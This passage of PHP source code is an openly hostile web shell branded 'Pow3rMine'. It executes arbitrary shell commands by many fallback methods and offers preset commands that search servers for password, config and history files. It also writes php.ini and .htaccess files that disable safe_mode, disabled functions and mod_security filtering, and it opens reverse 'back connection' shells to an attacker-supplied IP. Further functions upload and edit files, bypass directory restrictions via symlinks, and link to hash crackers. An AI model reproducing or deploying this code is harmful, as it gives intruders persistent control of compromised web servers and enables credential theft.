794. <option value='dir /s /w /b *config*.php'>Find *config*.php in current dir &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</option>
795. <option value='netstat -an'>Show active connections</option>
796. <option value='net start'>Show running services</option>
797. <option value='tasklist'>Show Pro</option>
798. <option value='net user'>User accounts</option>
799. <option value='net view'>Show computers</option>
800. <option value='arp -a'>ARP Table</option>
801. <option value='ipconfig /all'>IP Configuration</option>
802. <option value='netstat -an'>netstat -an</option>
803. <option value='systeminfo'>System Informations</option>
804. <option value='getmac'>Get Mac Address</option>
805. </select>
806. ";
807. }
808. else {
809. echo "
810. <select name='alias' id='alias' onChange='AddAlias();' >
811. <option value=''>NONE</option>
812. <option value='ls -la'>List dir</option>
813. <option value='cat /etc/hosts'>IP Addresses</option>
814. <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP</option>
815. <option value='lsattr -va'>list file attributes on a Linux second extended file system</option>
816. <option value='netstat -an | grep -i listen'>show opened ports</option>
817. <option value='find / -type f -perm -04000 -ls'>find all suid files</option>
818. <option value='find . -type f -perm -04000 -ls'>find suid files in current dir</option>
819. <option value='find / -type f -perm -02000 -ls'>find all sgid files</option>
820. <option value='find . -type f -perm -02000 -ls'>find sgid files in current dir</option>
821. <option value='find / -type f -name config.inc.php'>find config.inc.php files</option>
822. <option value='find / -type f -name \"config*\"'>find config* files</option>
823. <option value='find . -type f -name \"config*\"'>find config* files in current dir</option>
824. <option value='find / -perm -2 -ls'>find all writable folders and files</option>
825. <option value='find . -perm -2 -ls'>find all writable folders and files in current dir</option>
826. <option value='find / -type f -name service.pwd'>find all service.pwd files</option>
827. <option value='find . -type f -name service.pwd'>find service.pwd files in current dir</option>
828. <option value='find / -type f -name .htpasswd'>find all .htpasswd files</option>
829. <option value='find . -type f -name .htpasswd'>find .htpasswd files in current dir</option>
830. <option value='find / -type f -name .bash_history'>find all .bash_history files</option>
831. <option value='find . -type f -name .bash_history'>find .bash_history files in current dir</option>
832. <option value='find / -type f -name .fetchmailrc'>find all .fetchmailrc files</option>
833. <option value='find . -type f -name .fetchmailrc'>find .fetchmailrc files in current dir</option>
834. <option value='locate httpd.conf'>locate httpd.conf files</option>
835. <option value='locate vhosts.conf'>locate vhosts.conf files</option>
836. <option value='locate proftpd.conf'>locate proftpd.conf files</option>
837. <option value='locate psybnc.conf'>locate psybnc.conf files</option>
838. <option value='locate my.conf'>locate my.conf files</option>
839. <option value='locate admin.php'>locate admin.php files</option>
840. <option value='locate cfg.php'>locate cfg.php files</option>
841. <option value='locate conf.php'>locate conf.php files</option>
842. <option value='locate config.dat'>locate config.dat files</option>
843. <option value='locate config.php'>locate config.php files</option>
844. <option value='locate config.inc'>locate config.inc files</option>
845. <option value='locate config.inc.php'>locate config.inc.php</option>
846. <option value='locate config.default.php'>locate config.default.php files</option>
847. <option value='locate config'>locate config* files </option>
848. <option value='locate \".conf\"'>locate .conf files</option>
849. <option value='locate \".pwd\"'>locate .pwd files</option>
850. <option value='locate \".sql\"'>locate .sql files</option>
851. <option value='locate \".htpasswd\"'>locate .htpasswd files</option>
852. <option value='locate \".bash_history\"'>locate .bash_history files</option>
853. <option value='locate \".mysql_history\"'>locate .mysql_history files</option>
854. <option value='locate \".fetchmailrc\"'>locate .fetchmailrc files</option>
855. <option value='locate backup'>locate backup files</option>
856. <option value='locate dump'>locate dump files</option>
857. <option value='locate priv'>locate priv files</option>
858. </select>
859. ";
860. }
861. }
862. function CSS($sh3llColor) {
863. $css = "
864. <style>
865. BODY
866. {
867. FONT-FAMILY: Verdana;
868. margin: 2;
869. background-color: #000000;
870. color:white;
871. font-size:10pt;
872. }
873. sy
874. {
875. color:".$sh3llColor.";
876. font-size:7pt;
877. }
878. #Box
879. {
880. color:".$sh3llColor.";
881. background-color:#000;
882. font-size:14px;
883. font-weight:bold;
884.  
885. border:none;
886. }
887. table
888. {
889. border:none;
890. BORDER: #eeeeee outset;
891. BACKGROUND-COLOR: #000000;
892. color: #cccccc;
893. font-size:10px;
894. }
895. tr
896. {
897. BORDER-RIGHT: #cccccc 1px solid;
898. BORDER-TOP: #cccccc 1px solid;
899. BORDER-LEFT: #cccccc 1px solid;
900. BORDER-BOTTOM: #cccccc 1px solid;
901. color: #ffffff;
902. }
903. td
904. {
905. BORDER-RIGHT: #cccccc 1px solid;
906. BORDER-TOP: #cccccc 1px solid;
907. BORDER-LEFT: #cccccc 1px solid;
908. BORDER-BOTTOM: #cccccc 1px solid;
909. color: #cccccc;
910. }
911.  
912. input
913. {
914. BORDER-RIGHT: ".$sh3llColor." 1px solid;
915. BORDER-TOP: ".$sh3llColor." 1px solid;
916. BORDER-LEFT: ".$sh3llColor." 1px solid;
917. BORDER-BOTTOM: ".$sh3llColor." 1px solid;
918. BACKGROUND-COLOR: #333333;
919. font: 9pt tahoma;
920. color: #ffffff;
921. }
922. select
923. {
924. BORDER-RIGHT: #ffffff 1px solid;
925. BORDER-TOP: #999999 1px solid;
926. BORDER-LEFT: #999999 1px solid;
927. BORDER-BOTTOM: #ffffff 1px solid;
928. BACKGROUND-COLOR: #000000;
929. font: 9pt tahoma;
930. color: #CCCCCC;;
931. }
932. submit
933. {
934. BORDER: 1px outset buttonhighlight;
935. BACKGROUND-COLOR: #272727;
936. width: 40%;
937. color: #cccccc;
938. }
939. textarea
940. {
941. BORDER-RIGHT: #ffffff 1px solid;
942. BORDER-TOP: #999999 1px solid;
943. BORDER-LEFT: #999999 1px solid;
944. BORDER-BOTTOM: #ffffff 1px solid;
945. BACKGROUND-COLOR: #333333;
946. color: #ffffff;
947. }
948. .Save{
949. width:500px;
950. border-color:red;
951. }
952. A:link {COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
953. A:visited { COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
954. A:active {COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
955. A:hover {color:blue;TEXT-DECORATION: none;}
956. </style>
957. <script>
958. function openPHPInfo(){my_window= window.open (\"?info=getPhpInfo\",\"PHP Info\",\"width=800,height=600,scrollbars=1\"); }
959. function AddAlias(){document.getElementById('CMD_Line').value = document.getElementById('alias').value; }
960. function addUploadInput(){document.getElementById('uploadInput').innerHTML += '<input type=\'file\' name=\'uploadfile[]\'>'; }
961. function change_dir_mode() {
962. var dir_mode = document.getElementById('dir_mode').value;
963. document.location = '?dir_mode='+dir_mode;
964. }
965. </script>
966. ";
967. return $css;
968. }
969. function filter($string) {
970. if(get_magic_quotes_gpc() != 0){return stripslashes($string); }
971. else{return $string; }
972. }
973. function footer() {
974. echo '
975. <table width="100%">
976. <tr>
977. <td width="100%"><center>
978. <sy> ? </sy>Copyright © 2002-2014 Pow3erMine - All rights reserved.<sy> ?</sy></b><br/>
979.  
980. <sy> ? </sy>Skype: Pow3rMine | Email: onlinestresser@gmail.com<sy> ?</sy></b>
981. </center></td>
982. </tr>
983. </table>
984. </body></html>
985. ';
986. }
987. function print_exe_method() {
988. global $os; global $exec_method;
989. if($os == "Linux") {
990. ?>
991. <select name="exe_method" >
992. <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
993. <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system</option>
994. <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec</option>
995. <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
996. <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
997. <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
998. <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
999. <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
1000. </select>
1001. <?php
1002. } else {
1003. ?>
1004. <select name="exe_method" >
1005. <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
1006. <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system()</option>
1007. <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec()</option>
1008. <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
1009. <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
1010. <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
1011. <option value="win_shell_execute" <?php if($exec_method == "win_shell_execute") {echo "selected";} ?>>win_shell_execute()</option>
1012. <option value="win32_create_service" <?php if($exec_method == "win32_create_service") {echo "selected";} ?>>win32_create_service()</option>
1013. <option value="ffi" <?php if($exec_method == "ffi") {echo "selected";} ?>>ffi</option>
1014. <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
1015. <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
1016. <option value="slash_bypass <?php if($exec_method == "slash_bypass") {echo "selected";} ?>">slash bypass</option>
1017. </select>
1018. <?php
1019. }
1020. }
1021. function Exe($command) {
1022. global $dir;global $os;global $exec_method;
1023. $command = filter($command);
1024.  
1025. if($exec_method == "exec") {
1026. exec($command,$output);echo join("\n",$output);
1027. } else if($exec_method == "system") {
1028. system($command);
1029. } else if($exec_method == "shell_exec") {
1030. echo shell_exec($command);
1031. } else if($exec_method == "passthru") {
1032. passthru($command);
1033. } else if($exec_method == "proc_open") {
1034. echo proc_exec($command,$dir);
1035. } else if($exec_method == "popen") {
1036. $fp = popen($command,"r");{while(!feof($fp)){$result.=fread($fp,1024);}pclose($fp);}echo convert_cyr_string($result,"d","w");
1037. } else if($exec_method == "win_shell_execute") {
1038. echo winshell($command);
1039. } else if($exec_method == "win32_create_service") {
1040. echo srvshell($command);
1041. } else if($exec_method == "ffi") {
1042. echo ffishell($command);
1043. } else if($exec_method == "perl") {
1044. echo perlshell($command);
1045. } else if($exec_method == "python") {
1046. echo python_eval("import os\nos.system('".$command."')");
1047. } else if($exec_method == "slash_bypass") {
1048. echo slashBypass($command);
1049. }
1050. }
1051. function proc_exec($com , $dir) {
1052. $start_pipe=array(0=>array("pipe","w"),1=>array("pipe","w"));
1053. $process=proc_open($com,$start_pipe,$pipes,$dir,NULL);
1054. return stream_get_contents($pipes[1]);
1055. }
1056. function winshell($command) {
1057. $name=whereistmP()."\\".uniqid('NJ');
1058. win_shell_execute('cmd.exe','',"/C $command >\"$name\"");
1059. sleep(1);
1060. $exec=file_get_contents($name);
1061. DeleteFile($name);
1062. return $exec;
1063. }
1064. function srvshell($command) {
1065. $name=whereistmP()."\\".uniqid('NJ');
1066. $n=uniqid('NJ');
1067. $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
1068. win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
1069. win32_start_service($n);
1070. win32_stop_service($n);
1071. win32_delete_service($n);
1072. while(!file_exists($name))sleep(1);
1073. $exec=file_get_contents($name);
1074. DeleteFile($name);
1075. return $exec;
1076. }
1077. function ffishell($command) {
1078. $name=whereistmP()."\\".uniqid('NJ');
1079. $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
1080. $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
1081. while(!file_exists($name))sleep(1);
1082. $exec=file_get_contents($name);
1083. DeleteFile($name);
1084. return $exec;
1085. }
1086. function perlshell($command) {
1087. $perl=new perl();
1088. ob_start();
1089. $perl->eval("system('".$command."')");
1090. $exec=ob_get_contents();
1091. ob_end_clean();
1092. return $exec;
1093. }
1094. function slashBypass($cmd) {
1095. GenerateFile("cmd.bat","$cmd>sy3.txt"."\r\n exit");
1096. exec("\start cmd.bat");
1097. $content = file_get_contents('sy3.txt');
1098. unlink('sy3.txt');
1099. return $content;
1100. }
1101. function GenerateFile($name,$content) {
1102. if(function_exists('fopen') && function_exists('fclose')) {
1103. $file = fopen($name,"w+");
1104. if($file) {
1105. if(function_exists('fwrite')){$writeFile = fwrite($file,$content); }
1106. else if (function_exists('fputs')){$writeFile = fputs($file,$content); }
1107. else if (function_exists('file_put_contents')){$writeFile = file_put_contents($file,$content);}
1108. if(!$writeFile){return false;}
1109. }
1110. else{return false;}fclose($file);return true;
1111. }
1112. }
1113. function ScanDirs() {
1114. global $os; global $dir;global $safeMode;global $dir_mode;
1115. if($dir_mode == "cmd"){if($os == "Windows"){Exe('dir');}else{ Exe('ls -lia');}}
1116. else {
1117. $result .= "Perms Size Time Owner/Group R/W Type File
1118. -----------------------------------------------------------------------------
1119. ";
1120. $handel = opendir($dir);
1121. while(($file = readdir($handel))!= false)
1122. {
1123. $size = filesize($file);
1124. if(filetype($file) == "dir"){$type = "<DIR>";}else {$type = "<FILE>";}
1125. if(fileowner($file)){$owner = fileowner($file);}else{$owner = "NONE";}
1126. if(filegroup($file)){$group = filegroup($file);}else{$group = "NONE";}
1127. $perms = fileperms($file);
1128. $time = date("y/m/d", filectime($file));
1129. if(is_writable($file)){$isWritable = "Y";}else{$isWritable = "N";}
1130. if(is_readable($file)){$isReadable = "Y";}else{$isReadable = "N";}
1131. $result .= $perms." ".$size." ".$time." ".$owner."/".$group." ".$isReadable."/".$isWritable." ".$type." ".$file."
1132. ";
1133. }
1134. }
1135. return $result;
1136. }
1137. echo footer();
1138. ?>
1139. <?php
1140.  
1141. $user = 'powermine';
1142. $pass = 'spycorder';
1143. $uselogin = 1;
1144. $sh3llColor = "green";
1145.  
1146. # MySQL Info ---------
1147. $DBhost = "localhost";
1148. $DBuser = "root";
1149. $DBpass = "root";
1150. #---------------------
1151. session_start();
1152. error_reporting(0);
1153. set_magic_quotes_runtime(0);
1154. set_time_limit(0);
1155. ignore_user_abort(TRUE);
1156. ini_restore("safe_mode");
1157. ini_restore("open_basedir");
1158. ini_set('max_execution_time',0);
1159. ini_set('output_buffering',0);
1160. ini_set('safe_mode','Off');
1161.  
1162. // Set Current Directory
1163. if(!$_POST && !$_SESSION['curDir']) {
1164. $dir = getcwd();
1165. $_SESSION['curDir'] = $dir;
1166. } else if(empty($_POST['curDir'])) {
1167. $dir = $_SESSION['curDir'];
1168. } else {
1169. $dir = filter($_POST['curDir']);
1170. $_SESSION['curDir'] = $dir;
1171. }
1172. // Set Dir Mode
1173. if($_GET['dir_mode']) {
1174. $dir_mode = $_GET['dir_mode'];
1175. $_SESSION['dir_mode'] = $dir_mode;
1176. } else {
1177. $dir_mode = $_SESSION['dir_mode'];
1178. }
1179.  
1180. // Set Usable Command
1181. if($_POST['exe_method']) {
1182. $exec_method = $_POST['exe_method'];
1183. } else {
1184. $exec_method = "exec";
1185. }
1186. # Logout
1187. if($_POST['logout']) {
1188. print '<script>document.cookie="user=;";document.cookie="pass=;";</script>';
1189. print '<script>document.location = "'.$_SERVER['PHP_SELF'].'";</script>';
1190. }
1191. if(strlen($dir)>1 && $dir[1]==":"){$os = "Windows";}else {$os = "Linux";}
1192. if($_GET['info']){phpinfo();}
1193. $safeMode = SafeMode();
1194. $server = substr($SERVER_SOFTWARE,0,120);
1195. $daemon = "";
1196. ?>
1197. <html>
1198. <head>
1199. <title>Pow3rMine</title>
1200. <link rel="shortcut icon" href='https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcT7-pxiVlmAxaQgk783wl4ySiJ2yZWQL7NN-9_z4VIzvMNEOZdrjQ' />
1201. <meta http-equiv=Content-Type content=text/html; charset=UTF-8>
1202. <embed src="" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
1203. <?php echo CSS($sh3llColor); ?>
1204.  
1205. </head>
1206. <body dir='ltr'>
1207. <?php
1208. # ---------------------------------------#
1209. # Authentication #
1210. #----------------------------------------#
1211. if ($uselogin ==1) {
1212. if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass)) {
1213. if($_GET) {$user = $_GET['user'];$pass = $_GET['pass'];}
1214. if($_POST['usrname']==$user && $_POST['passwrd']==$pass){
1215. print'<script>document.cookie="user='.$_POST['usrname'].';";document.cookie="pass='.md5($_POST['passwrd']).';";</script>';
1216. } else {
1217. if($_POST['usrname']){
1218. print'<script>alert("Nike ta mère ffddddpppp");</script>';
1219. }
1220. ?>
1221. <br><br>
1222. <center><img src="https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcT7-pxiVlmAxaQgk783wl4ySiJ2yZWQL7NN-9_z4VIzvMNEOZdrjQ"><br />
1223. <sy>Pow3rMine</sy>
1224. </center><br />
1225. <div align="center">
1226. <form method="POST" name="login_form" onSubmit="if(this.usrname.value==''){return false;}">
1227. <input dir="ltr" name="usrname" id="username" value="" type="text" size="30" onBlur="Blur('username','userName');" onClick="Clear('username','userName');"/><br>
1228. <input dir="ltr" name="passwrd" id="password" value="" type="password" size="30" onFocus="Focus(2);" /><br>
1229. <input type="submit" value=" Login " name="login" />
1230. </form>
1231. </div>
1232. <?php
1233. footer();
1234. exit;
1235. }
1236. }
1237. }
1238. ?>
1239. <table cellpadding='0' cellspacing='0' width='100%'>
1240. <tr>
1241. <td width='160'>
1242. <center><form method="post"><input type="submit" value="Logout" name="logout" id="logout" /></form></center>
1243. <a href="<?php echo $_SERVER['PHP_SELF']; ?>"><img border='0' src='http://www.vexilenetwork.fr/dvz.png' width='100%' height='100%'></a><br>
1244. <center>PowerMine™
1245. <p></p>
1246. <select name="dir_mode" id="dir_mode" onchange="change_dir_mode();">
1247. <option value="cmd" <?php if($dir_mode == "cmd") {echo "selected";} ?> >CMD</option>
1248. <option value="php" <?php if($dir_mode == "php") {echo "selected";} ?>>PHP</option>
1249. </select>
1250. </center>
1251. </td>
1252. <td>
1253. <form method="post">
1254. <table width='100%' style="border:none; padding:2px;" >
1255. <tr>
1256. <td width='103'>System</td>
1257. <td width="323"><?php echo $os; ?></td>
1258. <td width="90">Apache Modules</td>
1259. <td width="278"><select ><?php
1260. if(function_exists("apache_get_modules")) {
1261. foreach (apache_get_modules() as $module) {
1262. echo "<option>".$module."</option>";
1263. }
1264. }else {
1265. echo "<option>NONE</option>";
1266. }
1267. ?></select></td>
1268. </tr>
1269. <tr>
1270. <td>uname </td>
1271. <td><a href='http://www.google.com/search?q=<?php echo php_uname(); ?>' target='_blank'><u><?php echo php_uname(); ?></u></a></td>
1272. <td>Curl</td>
1273. <td><?php echo Curl(); ?></td>
1274. </tr>
1275. <tr>
1276. <td>pwd</td>
1277. <td><?php echo getcwd(); ?></td>
1278. <td>Open Basedir</td>
1279. <td><?php echo openBaseDir(); ?></td>
1280. </tr>
1281. <tr>
1282. <td>whoami</td>
1283. <td><?php echo get_current_user(); ?></td>
1284. <td>Magic_Quotes</td>
1285. <td><?php echo magicQouts(); ?></td>
1286. </tr>
1287. <tr>
1288. <td>Server</td>
1289. <td><?php echo $server; ?></td>
1290. <td>Register Globals</td>
1291. <td><?php echo RegisterGlobals(); ?></td>
1292. </tr>
1293. <tr>
1294. <td>Server Name</td>
1295. <td><?php echo $_SERVER['HTTP_HOST']; ?></td>
1296. <td>Gzip</td>
1297. <td><?php echo Gzip(); ?></td>
1298. </tr>
1299. <tr>
1300. <td>Your IP</td>
1301. <td><?php echo GetRealIP(); ?></td>
1302. <td>Oracle</td>
1303. <td><?php echo Oracle(); ?></td>
1304. </tr>
1305. <tr>
1306. <td>Server IP</td>
1307. <td><a href='http://bing.com/search?q=ip:<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>&go=&form=QBLH&filt=all' target='_blank'><u><?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?></u></a> [<a href="http://whois.webhosting.info/<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>" target='_blank' />Reverse IP]</td>
1308. <td>MSQL</td>
1309. <td><?php echo MSQL(); ?></td>
1310. </tr>
1311. <tr>
1312. <td>PHP Version</td>
1313. <td><a href='javascript:openPHPInfo();'><u><?php echo phpversion(); ?></u></a></td>
1314. <td>MySQL</td>
1315. <td><?php echo MySQL2()." ".mysql_get_server_info(); ?></td>
1316. </tr>
1317. <tr>
1318. <td>Safe Mode</td>
1319. <td><?php echo $safeMode; ?></td>
1320. <td>MySQLi</td>
1321. <td><?php echo MysqlI(); ?></td>
1322. </tr>
1323. <tr>
1324. <td>disable functions</td>
1325. <td><select name="disableFunctions"><?php
1326. $funArray = DisableFunctions();
1327. $funArray = explode(",",$funArray);
1328. sort($funArray);
1329. foreach($funArray as $fun){echo "<option value='".$fun."'>".$fun."</option>";}
1330. ?></select>
1331. <input name="STOP_Execute" type="submit" id="STOP_Execute" value="Turn Off" />
1332. </td>
1333. <td>MsSQL</td>
1334. <td><?php echo MsSQL(); ?></td>
1335. </tr>
1336. </table>
1337. &nbsp; [<a href='http://www.md5decrypter.co.uk/' target='_blank'>MD5 Cracker</a>]
1338. [<a href='http://www.md5decrypter.co.uk/sha1-decrypt.aspx' target='_blank'>SHA1 Cracker</a>]
1339. [<a href='http://www.md5decrypter.co.uk/ntlm-decrypt.aspx' target='_blank'>NTLM Cracker</a>]
1340.  
1341. <input name="USERS_1" type="submit" id="USERS_1" value="Users [1]" />
1342. <input name="USERS_2" type="submit" id="USERS_2" value="Users [2]" />
1343. <input name="USERS_3" type="submit" id="USERS_3" value="Users [3]" />
1344. <input name="USERS_4" type="submit" id="USERS_4" value="Users [4]" />
1345. <input name="USERS_5" type="submit" id="USERS_5" value="Users [5]" />
1346. <input type="submit" name="forbidden_bypass" id="forbidden_bypass" value="Forbidden" />
1347. <input type="submit" name="find_755" id="find_755" value="Find 755" />
1348. <br>
1349. </form>
1350. </table>
1351.  
1352. <form method="post">
1353. <center>
1354. <textarea cols="150" rows="20" name="result" >
1355. <?php
1356. chdir($dir);
1357. if($_POST['login'] || !$_POST){echo ScanDirs();}
1358. else if($_POST['CMD_Execute']){if(empty($_POST['CMD_Line'])){echo scanDirs();}else {Exe(urldecode(filter($_POST['CMD_Line']))); }}
1359. else if($_POST['PHP_Execute']){$eval = Evaluation(urldecode(filter($_POST['PHP_Line'])));}
1360. else if($_POST['UPLOAD_Execute']) {
1361. for ($i = 0; $i < count($_FILES['uploadfile']['name']); $i++) {
1362. if($_FILES['uploadfile']['name'][$i] != '') {
1363. if(function_exists('copy')){$upload = copy($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
1364. else{$upload = move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
1365. if($upload) {echo "The File ".$_FILES['uploadfile']['name'][$i]." Uploaded Successfully !
1366. "; }
1367. else { echo "The File ".$_FILES['uploadfile']['name'][$i]." Can't Be Upload :( !
1368. ";}
1369. }
1370. }
1371. }
1372. else if($_POST['EDIT_Execute']){$content = htmlspecialchars(file_get_contents(filter($_POST['Edit_Line'])));echo $content;}
1373. else if($_POST['SAVE_Execute']) {
1374. $content = filter($_POST['result']);
1375. if(empty($content)){$content = " ";}
1376. if(GenerateFile($_POST['FILE_NAME'],$content)){echo "[+]Saved Success !! ";}else{echo "[-]Save Failed !";}
1377. }
1378. else if($_POST['READ_Execute']) {
1379. $path = urldecode(filter($_POST['READ_Line']));
1380. $file = fopen($path,'r+');
1381. if($_POST['READ_Type'] == "file"){echo htmlspecialchars(filter(FileF($path))); }
1382. else if($_POST['READ_Type'] == "fgets"){while(($line = htmlspecialchars(filter(fgets($file)))) != false){echo $line;}}
1383. else if($_POST['READ_Type'] == "fgetss"){while(($line = htmlspecialchars(filter(fgetss($file)))) != false){echo $line;}}
1384. else if($_POST['READ_Type'] == "readfile"){echo htmlspecialchars(filter(readfile($path)));}
1385. else if($_POST['READ_Type'] == "fread"){echo htmlspecialchars(filter(fread($file,filesize($path))));}
1386. else if($_POST['READ_Type'] == "file_get_contents"){echo htmlspecialchars(filter(file_get_contents($path)));}
1387. else if($_POST['READ_Type'] == "tempnam"){echo htmlspecialchars(filter(TempnameF($path)));}
1388. else if($_POST['READ_Type'] == "copy"){echo htmlspecialchars(filter(CopyF($path)));}
1389. else if($_POST['READ_Type'] == "mb_send_mail"){echo htmlspecialchars(filter(mbSendEmail($path)));}
1390. else if($_POST['READ_Type'] == "highlight_file"){echo htmlspecialchars(filter(highlightFile($path)));}
1391. else if($_POST['READ_Type'] == "curl"){echo htmlspecialchars(filter(CurlFileRead($path)));}
1392. else if($_POST['READ_Type'] == "imap"){echo htmlspecialchars(filter(ImapF($path)));}
1393. else if($_POST['READ_Type'] == "id"){echo htmlspecialchars(filter(ReadId($path)));}
1394. else if($_POST['READ_Type'] == "show_source"){echo htmlspecialchars(filter(show_source($path)));}
1395. else if($_POST['READ_Type'] == "mysql"){echo htmlspecialchars(filter(MySQLReader($path)));}
1396. else if($_POST['READ_Type'] == "mysqli"){echo htmlspecialchars(filter(MySQLIReader($path)));}
1397. else if($_POST['READ_Type'] == "symlink"){echo htmlspecialchars(filter(SymlinkF($path)));}
1398. else if($_POST['READ_Type'] == "ioncube"){echo htmlspecialchars(filter(ioncube_read_file($path)));}
1399. else if($_POST['READ_Type'] == "error_log"){echo htmlspecialchars(filter(ErrorLog($path)));}
1400. else if($_POST['READ_Type'] == "include"){echo htmlspecialchars(filter(IncludeReader($path)));}
1401. }
1402. else if($_POST['STOP_Execute']) {
1403. $genTry = GenerateFile("php.ini","
1404. safe_mode = Off
1405. disable_functions = NONE
1406. safe_mode_gid = OFF
1407. open_basedir = OFF");
1408. if($genTry){echo "[+] php.ini Has Been Generated Successfully
1409. ";}
1410. else {echo "[-] Failed to generate php.ini file !!
1411. ";}
1412.  
1413. $genTry = GenerateFile(".htaccess","
1414. <IfModule mod_security.c>
1415. SecFilterEngine Off
1416. SecFilterScanPOST Off
1417. SecFilterCheckURLEncoding Off
1418. SecFilterCheckCookieFormat Off
1419. SecFilterCheckUnicodeEncoding Off
1420. SecFilterNormalizeCookies Off
1421. </IfModule>
1422. <Limit GET POST>
1423. order deny,allow
1424. deny from all
1425. allow from all
1426. </Limit>
1427. <Limit PUT DELETE>
1428. order deny,allow
1429. deny from all
1430. </Limit>
1431. SetEnv PHPRC ".getcwd()."/php.ini
1432. ");
1433. if($genTry){echo "[+] .htaccess Has Been Generated Successfully
1434. ";}
1435. else {echo "[-] Failed to generate .htaccess file !!
1436. ";}
1437. }
1438. else if($_POST['CON_Type'] == "socks") {
1439. $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
1440. if($sock < 0){echo "[-] failed to create socket.";}
1441. else {
1442. $result = socket_connect($sock, filter(trim($_POST['ip'])), filter(trim($_POST['port'])));
1443. if($result < 0){echo "[-] failed to connect back to host:".$_GET['host'];}
1444. else {
1445. $send_var = "\n\n -== PowerMine , Back Connection ==-\n$";
1446. socket_write($sock, $send_var, strlen($send_var));
1447. while($input = socket_read($sock, 10000)) {
1448. socket_write($sock, shell_exec($input), 12000);
1449. }
1450. }
1451. }
1452. } else if($_POST['CON_Type'] == "fsockopen") {
1453. $ip = filter(trim($_POST['ip']));
1454. $port = filter(trim($_POST['port']));
1455. if (!empty($ip)) {
1456. $con_fsockopen = fsockopen($ip , $port , $errno, $errstr );
1457. if (!$con_fsockopen){
1458. $result = "Error: didnt connect !!!";
1459. } else {
1460. $newLine="\n";
1461. fputs ($con_fsockopen ,"\n\n -== SyRiAn Electronic Army , Back Connection ==-\n$");
1462. fputs($con_fsockopen , system("uname -a") .$newLine );
1463. fputs($con_fsockopen , system("pwd") .$newLine );
1464. fputs($con_fsockopen , system("id") .$newLine.$newLine );
1465. while(!feof($con_fsockopen)){
1466. fputs ($con_fsockopen);
1467. $one="[$";
1468. $two="]";
1469. $result= fgets ($con_fsockopen, 8192);
1470. $message = $result;
1471. fputs ($con_fsockopen, $one. system("whoami") .$two. " " .$message."\n");
1472. }
1473. fclose ($con_fsockopen);
1474. }
1475. }
1476. }
1477. else if($_POST['USERS_1']){echo GetUsers1();}
1478. else if($_POST['USERS_2']) {
1479. $array = GetUsers2();
1480. foreach($array as $line)
1481. {echo $line."
1482. ";}
1483. }
1484. else if($_POST['USERS_3']) {
1485. $array = GetUsers3();
1486. foreach($array as $line)
1487. {echo $line."
1488. ";}
1489. }
1490. else if($_POST['USERS_4']) {
1491. $array = GetUsers4();
1492. foreach($array as $line)
1493. {echo $line."
1494. ";}
1495. } else if($_POST['USERS_5']){echo GetUsers5();}
1496. else if($_POST['forbidden_bypass']) {
1497. mkdir("forbidden");
1498. chdir("forbidden");
1499. $forbidden_htaccess = GenerateFile(".htaccess", "
1500. DirectoryIndex sea.txt
1501. HeaderName sea.txt
1502. ReadmeName sea.txt
1503. footerName sea.txt
1504. ErrorDocument 404 /404.html
1505. 404.html = Symlinked sea.txt
1506. Options all
1507. ForceType text/plain
1508. AddType text/plain .php
1509. AddType text/plain .html
1510. AddHandler server-parsed .php
1511. AddHandler txt .php
1512. ");
1513. if($forbidden_htaccess) {
1514. echo "[+] make your symlink as sea.txt in /forbidden/ folder and find the url /forbidden/sea.txt or /forbidden/";
1515. } else {
1516. echo "[-] error with generating .htaccess file.";
1517. }
1518. } else if($_POST['find_755']) {
1519. Exe("ls -dl /home/*/public_html/ | grep drwxr-xr-x");
1520. }
1521. ?></textarea>
1522. <?php
1523. if($_POST['EDIT_Execute']){echo "<input type='submit' value='Save' name='SAVE_Execute' class='Save' />
1524. <input type='hidden' name='FILE_NAME' value='".$_POST['Edit_Line']."' />
1525. ";}
1526. ?>
1527. </center></form>
1528. <table width='100%'>
1529. <tr valign="top">
1530. <td width='30%'>
1531. <!-- Command Line -->
1532. <form method='POST' enctype="multipart/form-data">
1533. <table height='72' border='0' id='Box' width="100%">
1534. <tr>
1535. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
